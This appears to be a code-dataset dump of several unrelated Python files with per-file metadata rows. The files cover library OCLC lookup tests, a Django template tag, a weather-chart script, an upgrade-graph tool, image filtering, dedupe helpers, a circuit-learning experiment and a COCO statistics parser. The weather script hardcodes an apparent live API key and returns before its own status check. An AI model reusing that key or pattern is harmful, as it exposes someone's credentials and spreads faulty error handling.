"one_tuple_single_item": {(1000000000,)},
"one_tuple_multi_items": {(1, 6567842, 9987701, 53095235, 433981287)},
"two_tuples": {(1000000000,), (1, 6567842, 9987701, 53095235, 433981287)},
"empty_set": set(),
}
expected_lists = {
"one_tuple_single_item": [[1000000000]],
"one_tuple_multi_items": [[1, 6567842, 9987701, 53095235, 433981287]],
"two_tuples": [[1000000000], [1, 6567842, 9987701, 53095235, 433981287]],
"empty_set": []
}
for k, a_set in input_sets.items():
assert convert_set_to_list(a_set) == expected_lists[k]
def test_lookup_ocns_from_oclc(setup):
primary_db_path = setup["primary_db_path"]
cluster_db_path = setup["cluster_db_path"]
input_ocns = {
"one_ocn_primary_single_cluster": [1000000000],
"one_ocn_primary_multi_cluster": [1],
"one_other_ocn": [6567842],
"two_ocns": [1000000000, 6567842],
"one_invalid": [1234567890],
"two_invalid": [1234567890, 12345678901],
}
expected = {
"one_ocn_primary_single_cluster": {
"inquiry_ocns": [1000000000],
"matched_oclc_clusters": [[1000000000]],
"num_of_matched_oclc_clusters": 1,
},
"one_ocn_primary_multi_cluster": {
"inquiry_ocns": [1],
"matched_oclc_clusters": [[1, 6567842, 9987701, 53095235, 433981287]],
"num_of_matched_oclc_clusters": 1,
},
"one_other_ocn": {
"inquiry_ocns": [6567842],
"matched_oclc_clusters": [[1, 6567842, 9987701, 53095235, 433981287]],
"num_of_matched_oclc_clusters": 1,
},
"two_ocns": {
"inquiry_ocns": [1000000000, 6567842],
"matched_oclc_clusters": [[1000000000], [1, 6567842, 9987701, 53095235, 433981287]],
"num_of_matched_oclc_clusters": 2,
},
"one_invalid": {
"inquiry_ocns": [1234567890],
"matched_oclc_clusters": [],
"num_of_matched_oclc_clusters": 0,
},
"two_invalid": {
"inquiry_ocns": [1234567890, 12345678901],
"matched_oclc_clusters": [],
"num_of_matched_oclc_clusters": 0,
},
}
for k, ocns in input_ocns.items():
result = lookup_ocns_from_oclc(ocns, primary_db_path, cluster_db_path)
assert result["inquiry_ocns"] == ocns
assert result["matched_oclc_clusters"] == expected[k]["matched_oclc_clusters"]
assert result["num_of_matched_oclc_clusters"] == expected[k]["num_of_matched_oclc_clusters"]
# TEST cmd line options
def test_main(setup):
runner = CliRunner()
result = runner.invoke(main)
assert result.exit_code == 1
assert 'Usage' in result.output
result = runner.invoke(main, ['-t'])
#assert result.exit_code == 0
assert 'Running tests ...' in result.output
result = runner.invoke(main, ['--test'])
#assert result.exit_code == 0
assert 'Running tests ...' in result.output
result = runner.invoke(main, ['1'])
assert result.output == '{(1, 6567842, 9987701, 53095235, 433981287)}\n'
result = runner.invoke(main, ['2'])
assert result.output == '{(2, 9772597, 35597370, 60494959, 813305061, 823937796, 1087342349)}\n'
result = runner.invoke(main, ['1', '2'])
assert result.output == '{(2, 9772597, 35597370, 60494959, 813305061, 823937796, 1087342349), (1, 6567842, 9987701, 53095235, 433981287)}\n'
# '123' is not in the test db
result = runner.invoke(main, ['123'])
assert result.output == 'set()\n'
# FIXTURES
@pytest.fixture
def setup(tmpdatadir, csv_to_df_loader):
dfs = csv_to_df_loader
primary_db_path = create_primary_db(tmpdatadir, dfs["primary.csv"])
cluster_db_path = create_cluster_db(tmpdatadir, dfs["primary.csv"])
os.environ["OVERRIDE_PRIMARY_DB_PATH"] = primary_db_path
os.environ["OVERRIDE_CLUSTER_DB_PATH"] = cluster_db_path
return {
"tmpdatadir": tmpdatadir,
"dfs": dfs,
"primary_db_path": primary_db_path,
"cluster_db_path": cluster_db_path
}
# HELPERS
def int_to_bytes(inum):
return inum.to_bytes((inum.bit_length() + 7) // 8, "big")
def int_from_bytes(bnum):
return int.from_bytes(bnum, "big")
def create_primary_db(path, df):
"""Create a primary ocn lookup LevelDB database based with test data
Note:
1) Expects a dataframe: [ocn, primary]
Args:
Path: Database path
df: Pandas dataframe of test data [ocn, primary]
Returns:
Path to the LevelDB database
"""
db_path = os.path.join(path, "primary/")
db = plyvel.DB(db_path, create_if_missing=True)
df = df.sort_values(by=["ocn"])
ocn_pos = df.columns.get_loc("ocn") + 1
primary_pos = df.columns.get_loc("primary") + 1
for row in df.itertuples():
db.put(int_to_bytes(row[ocn_pos]), int_to_bytes(row[primary_pos]))
db.close()
return db_path
def create_cluster_db(path, df):
"""Create a cluster ocns lookup LevelDB database based with test data
Note:
1) Expects a dataframe: [ocn, primary]
2) Produces a LevelDB with key(primary) and value([ocns,...])
3) Primary-only clusters are excluded
Args:
Path: Database path
df: Pandas dataframe of test data [ocn, primary]
Returns:
Path to the LevelDB database
"""
db_path = os.path.join(path, "cluster/")
db = plyvel.DB(db_path, create_if_missing=True)
packer = msgpack.Packer()
df = df.sort_values(by=["primary","ocn"])
ocn_pos = df.columns.get_loc("ocn") + 1
primary_pos = df.columns.get_loc("primary") + 1
current_primary = 0
cluster = []
for row in df.itertuples():
if row[primary_pos] != current_primary:
if current_primary != 0:
if len(cluster) > 0:
db.put(int_to_bytes(current_primary), packer.pack(cluster))
current_primary = row[primary_pos]
cluster = []
if current_primary != row[ocn_pos]:
cluster.append(row[ocn_pos])
if len(cluster) > 0:
db.put(int_to_bytes(current_primary), packer.pack(cluster))
db.close()
return db_path
| 34.877907 | 144 | 0.657443 | 1,554 | 11,998 | 4.710425 | 0.104247 | 0.064754 | 0.06571 | 0.054098 | 0.692213 | 0.587568 | 0.545765 | 0.510246 | 0.480191 | 0.441393 | 0 | 0.126434 | 0.230038 | 11,998 | 343 | 145 | 34.979592 | 0.665945 | 0.087431 | 0 | 0.328063 | 0 | 0.003953 | 0.187183 | 0.082988 | 0 | 0 | 0 | 0 | 0.094862 | 1 | 0.071146 | false | 0 | 0.047431 | 0.007905 | 0.13834 | 0.003953 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ec961b19adfa565a12853c2adc2c965a0227de8 | 675 | py | Python | commons/templatetags/i18n_utils.py | jaboutboul/almalinux.org | 1dda8faff0e84e650fc9a90e9a104d387b4dd038 | [
"MIT"
] | null | null | null | commons/templatetags/i18n_utils.py | jaboutboul/almalinux.org | 1dda8faff0e84e650fc9a90e9a104d387b4dd038 | [
"MIT"
] | null | null | null | commons/templatetags/i18n_utils.py | jaboutboul/almalinux.org | 1dda8faff0e84e650fc9a90e9a104d387b4dd038 | [
"MIT"
] | null | null | null | from typing import Dict
from django import template
from django.urls import resolve, reverse
from django.urls.exceptions import Resolver404
from django.utils import translation
register = template.Library()
@register.simple_tag(takes_context=True)
def current_path_for_language_code(context: Dict, code: str) -> str:
try:
view = resolve(context['request'].path)
except Resolver404:
view = resolve('/')
request_language = translation.get_language()
try:
translation.activate(code)
url = reverse(view.url_name, args=view.args, kwargs=view.kwargs)
finally:
translation.activate(request_language)
return url
| 25 | 72 | 0.724444 | 82 | 675 | 5.841463 | 0.47561 | 0.083507 | 0.058455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010929 | 0.186667 | 675 | 26 | 73 | 25.961538 | 0.861566 | 0 | 0 | 0.105263 | 0 | 0 | 0.011852 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.263158 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5eca5d623cda5a3b20dea4d0ab793ea0d10b5c10 | 2,113 | py | Python | weather_forecast.py | pub12/weather-forecast | 20eefaa3a290af659fe3cc69c67858891d449fba | [
"MIT"
] | 1 | 2021-09-04T12:06:31.000Z | 2021-09-04T12:06:31.000Z | weather_forecast.py | pub12/weather-forecast | 20eefaa3a290af659fe3cc69c67858891d449fba | [
"MIT"
] | null | null | null | weather_forecast.py | pub12/weather-forecast | 20eefaa3a290af659fe3cc69c67858891d449fba | [
"MIT"
] | null | null | null | import requests
import datetime, pytz
from quickchart import QuickChart
OPEN_WEATHER_MAP_APIKEY = '16786afe8ea0f6b683ab9298e52ac247'
def get_weather_data_by_location( lat, long):
url = f'https://api.openweathermap.org/data/2.5/onecall?lat={lat}&lon={long}&appid={OPEN_WEATHER_MAP_APIKEY}&units=metric'
print(f"Getting data via {url}")
r = requests.get(url)
return r.json()
if r.status_code == 200:
return r.json()
else:
return None
def get_quick_chart( json_data , output_file):
qc = QuickChart()
qc.width = 500
qc.width = 500
labels = [] #Declare to hold the x-axis tick labels
weather_readings = [] #get the data labels
for index in range( 1, 8):
local_time = datetime.datetime.fromtimestamp( json_data['daily'][index]['dt'] , tz=pytz.timezone('Asia/Singapore'))
labels.append( local_time.strftime( '%a %d/%m ' ) )
weather_readings.append( round( json_data['daily'][index]['temp']['day'] ,1) )
qc.config = """{
type: 'line',
data: {
labels: """ + str( labels ) + """,
datasets: [
{
backgroundColor: 'rgb(255, 99, 132)',
data: """ + str( weather_readings) + """,
lineTension: 0.4,
fill: false,
}
],
},
options: {
title: { display: true, text: '7-Day Weather Forecast' },
legend: { display: false},
scales: { yAxes: [ { scaleLabel:
{ display: true, labelString: 'Temperature Degrees Celcius' } } ]},
plugins: {
datalabels: {
display: true,
align: 'bottom',
backgroundColor: '#ccc',
borderRadius: 3
},
}
},
}"""
print(qc.get_short_url()) #Print out the chart URL
qc.to_file(output_file) #Save to a file
if __name__ == '__main__':
print("Getting Weather Data")
json_data = get_weather_data_by_location( '22.300910042194783', '114.17070449064359')
get_quick_chart( json_data , 'mychart.png' )
| 29.760563 | 123 | 0.568859 | 236 | 2,113 | 4.915254 | 0.550847 | 0.034483 | 0.024138 | 0.034483 | 0.077586 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0538 | 0.296261 | 2,113 | 70 | 124 | 30.185714 | 0.726295 | 0.044487 | 0 | 0.070175 | 0 | 0.017544 | 0.537736 | 0.015889 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035088 | false | 0 | 0.052632 | 0 | 0.140351 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5eca95466b6c45dbaa04be04c01346c77b736894 | 2,269 | py | Python | hack/graph.py | dofinn/cincinnati | 9a55fde2c8a7746d1b8e99d72e3ce5daa7aba837 | [
"Apache-2.0"
] | null | null | null | hack/graph.py | dofinn/cincinnati | 9a55fde2c8a7746d1b8e99d72e3ce5daa7aba837 | [
"Apache-2.0"
] | 25 | 2021-09-15T04:27:06.000Z | 2022-03-08T20:27:49.000Z | hack/graph.py | dofinn/cincinnati | 9a55fde2c8a7746d1b8e99d72e3ce5daa7aba837 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
import argparse
import sys
import json
from typing import Dict, List
def run():
parser = argparse.ArgumentParser(description=f'Output digraph data for Cincinnati json',
usage="curl -sH 'Accept:application/json' 'https://api.openshift.com/api/upgrades_info/v1/graph?channel=stable-4.5' | ./graph.py --include-hotfixes | dot -Tsvg >graph.svg")
parser.add_argument('--include-hotfixes', dest='hotfixes', action='store_true')
parser.set_defaults(hotfixes=False)
args = parser.parse_args()
graph: Dict = json.load(sys.stdin)
version_list: List[str] = list() # a list of versions in the order returned by Cincy
versions: Dict[str, Dict] = dict() # maps version string to Cincy dict describing it
edges: Dict[str, List] = dict() # maps version string to list of version strings it has outgoing edges to
for node in graph['nodes']:
version = node['version']
version_list.append(version)
versions[version] = node
# Ensure there is at least an empty list for all versions.
edges[version] = []
for edge_def in graph['edges']:
# edge_def example [22, 20] where is number is an offset into versions
from_ver = version_list[edge_def[0]]
to_ver = version_list[edge_def[1]]
edges[from_ver].append(to_ver)
nodes_to_render = dict(versions) # make a copy
if not args.hotfixes:
for version in versions.keys():
if 'hotfix' in version or 'nightly' in version:
nodes_to_render.pop(version)
version_order = list(nodes_to_render.keys())
print('digraph Upgrades {')
print(' labelloc=t;')
print(' rankdir=BT;')
for index, version in enumerate(version_order):
node = versions[version]
url = node.get('metadata', {}).get('url', '')
print(f' {index} [ label="{version}" href="{url}" ];')
for index, version in enumerate(version_order):
for edge in edges[version]:
if not args.hotfixes and ('hotfix' in edge or 'nightly' in edge):
continue
dest = version_order.index(edge)
print(f' {index}->{dest};')
print('}')
if __name__ == '__main__':
run()
| 36.015873 | 210 | 0.631556 | 301 | 2,269 | 4.644518 | 0.421927 | 0.031474 | 0.027897 | 0.030043 | 0.11731 | 0.054363 | 0.054363 | 0 | 0 | 0 | 0 | 0.005848 | 0.246364 | 2,269 | 62 | 211 | 36.596774 | 0.811696 | 0.144998 | 0 | 0.044444 | 0 | 0.022222 | 0.211588 | 0.012933 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022222 | false | 0 | 0.088889 | 0 | 0.111111 | 0.133333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ecb818dfb22cd3164c6594184c3fa42e6bdc1d1 | 543 | py | Python | third_party/manipulate_images.py | DahlitzFlorian/python-snippets | 212f63f820b6f5842f74913ed08da18d41dfe7a4 | [
"MIT"
] | 29 | 2019-03-25T09:35:12.000Z | 2022-01-08T22:09:03.000Z | third_party/manipulate_images.py | DahlitzFlorian/python-snippets | 212f63f820b6f5842f74913ed08da18d41dfe7a4 | [
"MIT"
] | null | null | null | third_party/manipulate_images.py | DahlitzFlorian/python-snippets | 212f63f820b6f5842f74913ed08da18d41dfe7a4 | [
"MIT"
] | 4 | 2020-05-19T21:18:12.000Z | 2021-05-18T12:49:21.000Z | import imageio
import numpy as np
import scipy.ndimage
start_img = imageio.imread(
"http://static.cricinfo.com/db/PICTURES/CMS/263600/263697.20.jpg"
)
gray_inv_img = 255 - np.dot(start_img[..., :3], [0.299, 0.587, 0.114])
blur_img = scipy.ndimage.filters.gaussian_filter(gray_inv_img, sigma=5)
def dodge(front, back):
result = front * 255 / (255 - back)
result[np.logical_or(result > 255, back == 255)] = 255
return result.astype("uint8")
final_img = dodge(blur_img, gray_inv_img)
imageio.imwrite("final.jpg", final_img)
| 25.857143 | 71 | 0.707182 | 87 | 543 | 4.252874 | 0.551724 | 0.056757 | 0.081081 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.100642 | 0.139963 | 543 | 20 | 72 | 27.15 | 0.691649 | 0 | 0 | 0 | 0 | 0.071429 | 0.141805 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.214286 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ecdc8b1a11d72a44089a8ee90fca21bec3ec6e2 | 935 | py | Python | dedupe/convenience.py | BrianSipple/dedupe | d276da675e319d5cc6e7cafd4963deebde0d485d | [
"MIT"
] | 1 | 2015-11-06T01:33:04.000Z | 2015-11-06T01:33:04.000Z | dedupe/convenience.py | BrianSipple/dedupe | d276da675e319d5cc6e7cafd4963deebde0d485d | [
"MIT"
] | null | null | null | dedupe/convenience.py | BrianSipple/dedupe | d276da675e319d5cc6e7cafd4963deebde0d485d | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Convenience functions for in memory deduplication
"""
import collections
import dedupe.core
def dataSample(data, sample_size):
'''Randomly sample pairs of records from a data dictionary'''
data_list = data.values()
random_pairs = dedupe.core.randomPairs(len(data_list), sample_size)
return tuple((data_list[k1], data_list[k2]) for k1, k2 in random_pairs)
def blockData(data_d, blocker):
blocks = dedupe.backport.OrderedDict({})
record_blocks = dedupe.backport.OrderedDict({})
key_blocks = dedupe.backport.OrderedDict({})
blocker.tfIdfBlocks(data_d.iteritems())
for (record_id, record) in data_d.iteritems():
for key in blocker((record_id, record)):
blocks.setdefault(key, {}).update({record_id : record})
blocked_records = tuple(block for block in blocks.values())
return blocked_records
| 23.375 | 75 | 0.682353 | 117 | 935 | 5.299145 | 0.444444 | 0.051613 | 0.096774 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00664 | 0.194652 | 935 | 39 | 76 | 23.974359 | 0.816733 | 0.154011 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ece7144c7b2ec17653f0f9dba2cd6ae36bf25de | 11,099 | py | Python | bin/xpc_gsd_exp.py | gengala/Random-Probabilistic-Circuits | 8871a9f1e6ace9d8ea7604b69abcc270c7792620 | [
"Apache-2.0"
] | 5 | 2021-05-20T10:39:47.000Z | 2022-01-23T09:37:38.000Z | bin/xpc_gsd_exp.py | gengala/Random-Probabilistic-Circuits | 8871a9f1e6ace9d8ea7604b69abcc270c7792620 | [
"Apache-2.0"
] | null | null | null | bin/xpc_gsd_exp.py | gengala/Random-Probabilistic-Circuits | 8871a9f1e6ace9d8ea7604b69abcc270c7792620 | [
"Apache-2.0"
] | null | null | null | import argparse
try:
from time import perf_counter
except:
from time import time
perf_counter = time
import dataset
import numpy as np
import datetime
import os
import logging
from src.inference import log_likelihood
from src.xpc import create_xpc, SD_LEVEL_2
from src.cltree import create_cltree
from utils import circuit_size
from error import Error, NoPartitioningFound
def stats_format(stats_list, separator, digits=5):
formatted = []
float_format = '{0:.' + str(digits) + 'f}'
for stat in stats_list:
if isinstance(stat, int):
formatted.append(str(stat))
elif isinstance(stat, float):
formatted.append(float_format.format(stat))
else:
formatted.append(stat)
# concatenation
return separator.join(formatted)
#########################################
# creating the opt parser
parser = argparse.ArgumentParser()
parser.add_argument("dataset", type=str, nargs=1,
help='Specify a dataset name from data (e.g. nltcs)')
parser.add_argument('-r', '--runs', type=int, nargs=1,
default=10,
help='Number of runs for each configuration')
parser.add_argument('-det', '--determinism', type=int, nargs='+',
default=[0],
help='0 for no determinism; 1 for determinism')
parser.add_argument('-m', '--min-partition-instances', type=int, nargs='+',
default=[256],
help='Minimum number of instances per partition')
parser.add_argument('-l', '--conjunction-length', type=int, nargs='+',
default=[2],
help='Conjunction length')
parser.add_argument('-a', '--arity', type=int, nargs='+',
default=[2],
help='Maximum number of sum nodes children')
parser.add_argument('-p', '--max-partitions', type=int, nargs='+',
default=[1000],
help='Maximum number of leaf partitions')
parser.add_argument('-s', '--smoothing', type=float, nargs='+',
default=[0.01],
help='Smoothing parameter alpha')
parser.add_argument('-o', '--output', type=str, nargs='?',
default='./exp/',
help='Output dir path')
#
# parsing the args
args = parser.parse_args()
#
# gathering args
runs = args.runs[0]
det_level_l = args.determinism
min_part_inst_l = args.min_partition_instances
conj_len_l = args.conjunction_length
arity_l = args.arity
max_parts_l = args.max_partitions
alpha_smoothing_l = args.smoothing
output = args.output
(dataset_name,) = args.dataset
#
# Opening the file for test prediction
date_string = datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
out_path = output + dataset_name + '_' + date_string
out_xpc_gsd_path = out_path + '/xpc_gsd.lls'
#
# creating dir if non-existing
if not os.path.exists(os.path.dirname(out_xpc_gsd_path)):
os.makedirs(os.path.dirname(out_xpc_gsd_path))
logging.basicConfig(filename=out_path + '/exp.log', level=logging.INFO)
logging.info("Starting with arguments:\n%s", args)
# I shall print here all the stats
#
# elaborating the dataset
logging.info('Loading dataset: %s..', dataset_name)
train, valid, test = dataset.load_train_val_test_csvs(dataset_name)
preamble = "runs\tdet-level\tmin-part-inst\t" \
"conj-len\tarity\tmax-parts\tsmoothing\t" \
"avg-spn-train-time\t" \
"avg-n-parts\tstd-n-parts\t" \
"avg-circuit-sizes\tstd-circuit-sizes\t" \
"avg-avg-valid-lls\tstd-avg-valid-lls\t" \
"avg-avg-test-lls\tstd-avg-test-lls\t" \
"best-spn-avg-test-ll\n"
exp_start_t = perf_counter()
with open(out_xpc_gsd_path, 'w') as out_xpc_gsd:
out_xpc_gsd.write("parameters:\n{0}\n\n".format(args))
out_xpc_gsd.write(preamble)
out_xpc_gsd.flush()
total_combinations = np.prod([len(det_level_l), len(min_part_inst_l), len(conj_len_l),
len(arity_l), len(max_parts_l), len(alpha_smoothing_l)])
comb_counter = 1
#
# looping over all parameters combinations
for det_level in det_level_l:
for min_part_inst in min_part_inst_l:
for conj_len in conj_len_l:
for arity in arity_l:
for max_parts in max_parts_l:
for alpha_smoothing in alpha_smoothing_l:
combination_string = 'ds=%s, det=%s, m=%s, l=%s, a=%s, p=%s, s=%s, (%s/%s)' % \
(dataset_name, det_level, min_part_inst, conj_len, arity,
max_parts, alpha_smoothing, comb_counter, total_combinations)
print(combination_string)
logging.info('Combination: %s' % combination_string)
try:
#
# Start training
xpc_gsd_l = [None] * runs
n_parts_l = [None] * runs
train_start_t = perf_counter()
for k in range(runs):
xpc_gsd_l[k], n_parts_l[k] = \
create_xpc(data=train,
sd_level=SD_LEVEL_2,
det_level=det_level,
min_part_inst=min_part_inst,
conj_len=conj_len,
arity=arity,
leaves=create_cltree,
alpha=alpha_smoothing,
max_parts=max_parts,
random_seed=k)
train_end_t = perf_counter()
train_t = train_end_t - train_start_t
#
# End training
#
# Start validating
valid_lls = np.zeros((valid.shape[0], runs))
valid_start_t = perf_counter()
for k in range(runs):
print('Validating XPC_%s/%s' % (k, runs))
valid_lls[:, k] = log_likelihood(xpc_gsd_l[k], valid)[:, 0]
valid_end_t = perf_counter()
valid_t = valid_end_t - valid_start_t
#
# End validating
#
# Start testing
test_lls = np.zeros((test.shape[0], runs))
test_start_t = perf_counter()
for k in range(runs):
print('Testing XPC_%s/%s' % (k, runs))
test_lls[:, k] = log_likelihood(xpc_gsd_l[k], test)[:, 0]
test_end_t = perf_counter()
test_t = test_end_t - test_start_t
#
# End testing
#
# Start computing metrics
avg_spn_train_t = train_t / runs
avg_n_parts = np.mean(n_parts_l)
std_n_parts = np.std(n_parts_l)
circuit_sizes = np.zeros(runs)
for k in range(runs):
circuit_sizes[k] = circuit_size(xpc_gsd_l[k])
avg_circuit_sizes = np.mean(circuit_sizes)
std_circuit_sizes = np.std(circuit_sizes)
avg_valid_lls = np.zeros(runs)
for k in range(runs):
avg_valid_lls[k] = np.mean(valid_lls[:, k])
avg_avg_valid_lls = np.mean(avg_valid_lls)
std_avg_valid_lls = np.std(avg_valid_lls)
avg_test_lls = np.zeros(runs)
for k in range(runs):
avg_test_lls[k] = np.mean(test_lls[:, k])
avg_avg_test_lls = np.mean(avg_test_lls)
std_avg_test_lls = np.std(avg_test_lls)
best_spn_avg_test_ll = avg_test_lls[np.argmax(avg_valid_lls)]
#
# End computing metrics
#
# Write to file a line for the grid
stats = stats_format([runs,
det_level,
min_part_inst,
conj_len,
arity,
max_parts,
alpha_smoothing,
avg_spn_train_t,
avg_n_parts,
std_n_parts,
avg_circuit_sizes,
std_circuit_sizes,
avg_avg_valid_lls,
std_avg_valid_lls,
avg_avg_test_lls,
std_avg_test_lls,
best_spn_avg_test_ll],
'\t',
digits=5)
out_xpc_gsd.write(stats + '\n')
out_xpc_gsd.flush()
except Error as err:
logging.info(err)
logging.info('Discarded combination')
except Exception as err:
logging.exception(err)
finally:
comb_counter += 1
exp_end_t = perf_counter()
out_xpc_gsd.close()
print('Grid search ended on ' + dataset_name)
logging.info('Grid search ended on ' + dataset_name)
| 40.655678 | 111 | 0.441211 | 1,101 | 11,099 | 4.176203 | 0.196185 | 0.022184 | 0.021531 | 0.014354 | 0.173119 | 0.141148 | 0.11853 | 0.089169 | 0.07264 | 0.053067 | 0 | 0.005465 | 0.472475 | 11,099 | 272 | 112 | 40.805147 | 0.779846 | 0.035949 | 0 | 0.065574 | 0 | 0.005464 | 0.0912 | 0.024094 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005464 | false | 0 | 0.071038 | 0 | 0.081967 | 0.021858 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ed1a2ebe6b18d55c5ac39c8d12715c6e6c4aa9a | 8,202 | py | Python | src/mycocoparser.py | partham16/ev_objdet_pc | 2ab64c94a9d7693f92bb3e4466014260f77072bb | [
"MIT"
] | null | null | null | src/mycocoparser.py | partham16/ev_objdet_pc | 2ab64c94a9d7693f92bb3e4466014260f77072bb | [
"MIT"
] | null | null | null | src/mycocoparser.py | partham16/ev_objdet_pc | 2ab64c94a9d7693f92bb3e4466014260f77072bb | [
"MIT"
] | null | null | null | # Motivation for replacing the default `coco` parser
# See Issue : https://github.com/airctic/icevision/issues/467
import json
import os
import pickle
from collections import defaultdict
from pathlib import Path
from typing import Dict, Hashable, List, Tuple, Union
import numpy as np
from icevision import ClassMap
from icevision.core import BBox
from icevision.parsers import Parser
from icevision.parsers.mixins import (BBoxesMixin, FilepathMixin, LabelsMixin,
SizeMixin)
from PIL import Image, ImageStat
from tqdm import tqdm
def empty_list():
return []
class CocoDatasetStats:
"""Calculate dataset stats"""
# num_cats
# num_imgs
# num_bboxs
# cat2name
# class_map
# lbl2cat
# cat2lbl
# img2fname
# imgs
# img2cat2bs
# img2cbs
# cat2ibs
# avg_ncats_per_img
# avg_nboxs_per_img
# avg_nboxs_per_cat
# img2sz
# chn_means
# chn_stds
# avg_width
# avg_height
def __init__(self, f_ann: str, img_dir: Path):
self.img_dir = img_dir
with open(f_ann, "r") as json_f:
ann = json.load(json_f)
self.num_cats = len(ann["categories"])
self.num_imgs = len(ann["images"])
self.num_bboxs = len(ann["annotations"])
# build cat id to name, assign FRCNN
self.cat2name = {c["id"]: c["name"] for c in ann["categories"]}
self.class_map = ClassMap(list(self.cat2name.values()))
# need to translate coco subset category id to indexable label id
# expected labels w 0 = background
self.lbl2cat = {self.class_map.get_name(n): c for c, n in self.cat2name.items()}
self.cat2lbl = {cat: lbl for lbl, cat in self.lbl2cat.items()}
self.lbl2cat[0] = (0, "background")
self.cat2lbl[0] = 0
# img_id to file map
self.img2fname = {img["id"]: img["file_name"] for img in ann["images"]}
self.imgs = [
{"id": img_id, "file_name": img_fname}
for (img_id, img_fname) in self.img2fname.items()
]
# build up some maps for later analysis
self.img2l2bs: Dict = {}
self.img2lbs: Dict = defaultdict(empty_list)
self.l2ibs: Dict = defaultdict(empty_list)
# anno_id = 0
for a in ann["annotations"]:
img_id = a["image_id"]
cat_id = a["category_id"]
lbl_id = self.cat2lbl[cat_id]
l2bs_for_img = self.img2l2bs.get(
img_id, {lbl: [] for lbl in range(1 + len(self.cat2name))}
)
(x, y, w, h) = a["bbox"]
if w > 1 and h > 1:
b = (x, y, w, h)
ib = (img_id, *b)
lb = (lbl_id, *b)
l2bs_for_img[lbl_id].append(b)
self.l2ibs[lbl_id].append(ib)
self.img2lbs[img_id].append(lb)
self.img2l2bs[img_id] = l2bs_for_img
acc_ncats_per_img = 0.0
acc_nboxs_per_img = 0.0
for img_id, l2bs in self.img2l2bs.items():
acc_ncats_per_img += len(l2bs)
for lbl_id, bs in l2bs.items():
acc_nboxs_per_img += len(bs)
self.avg_ncats_per_img = acc_ncats_per_img / self.num_imgs
self.avg_nboxs_per_img = acc_nboxs_per_img / self.num_imgs
acc_nboxs_per_cat = 0.0
for lbl_id, ibs in self.l2ibs.items():
acc_nboxs_per_cat += len(ibs)
self.avg_nboxs_per_cat = acc_nboxs_per_cat / self.num_cats
# compute Images per channel means and std deviation using PIL.ImageStat.Stat()
self.img2sz = {}
n = 0
mean = np.zeros((3,))
stddev = np.zeros((3,))
avgw = 0
avgh = 0
for img in tqdm(self.imgs):
img_id = img["id"]
fname = f"{img_dir}/{img['file_name']}"
n = n + 1
img = Image.open(fname)
istat = ImageStat.Stat(img)
width, height = img.size
avgw = (width + (n - 1) * avgw) / n
avgh = (height + (n - 1) * avgh) / n
self.img2l2bs[img_id][0].append(
(
width / 3,
height / 3,
width / 3,
height / 3,
)
) # hack to add a backgrnd box
mean = (istat.mean + (n - 1) * mean) / n
stddev = (istat.stddev + (n - 1) * stddev) / n
self.img2sz[fname] = (width, height)
self.chn_means = mean
self.chn_stds = stddev
self.avg_width = avgw
self.avg_height = avgh
def load_stats(f_ann: str, img_dir: Path, force_reload: bool = False):
"""load (or calculate) the stat"""
stats_fpath = f"{img_dir}/stats.pkl"
stats = None
if os.path.isfile(stats_fpath) and not force_reload:
try:
stats = pickle.load(open(stats_fpath, "rb"))
except Exception as e:
